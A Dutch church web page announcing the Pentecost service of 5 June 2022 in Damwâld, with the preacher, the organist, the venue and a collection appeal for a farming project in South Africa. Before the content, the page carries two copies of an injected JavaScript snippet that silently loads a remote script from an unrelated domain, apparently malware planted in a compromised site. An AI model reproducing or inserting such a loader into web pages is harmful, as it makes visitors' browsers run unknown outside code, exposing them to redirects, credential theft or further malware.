;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 5 juni 2022 9:30 uur - PKN Damwâld
zondag 5 juni 2022
09:30 uur
Eerste Pinksterdag

Kerkdienst zondag 5 juni 2022 9:30 uur

Informatie

Voorganger:Ds. J.G. Arendsman, Drachten
Organist:Foeke Wiegersma
Mededeling:Eerste Pinksterdag
Locatie: de Ontmoeting Foarwei 38, 9104 BX Damwâld
Collecte informatie
Eerste collecte: Pinkstercollecte Kerk in Actie – Zending (collectenummer 22057)

Zuid-Afrika Bijbel brengt arme boeren in actie. Veel arme boeren in de Zuid-Afrikaanse provincie KwaZulu-Natal leven al generaties lang in armoede. Ze geloven niet dat hun leven ooit zal verbeteren. Een christelijke ontwikkelingsorganisatie doorbreekt deze mentaliteit door boerenfamilies te laten samenwerken. De organisatie inspireert hen met Bijbelverhalen en leert hun hoe ze met betere landbouwmethoden de voedselopbrengst kunnen verhogen. In het kader van ‘jong geleerd, oud gedaan’ investeert de organisatie juist ook in kinderen zodat er een structurele verbetering van de leefomstandigheden optreedt.

Uitganscollecte: Bij de uitgang of via QR-code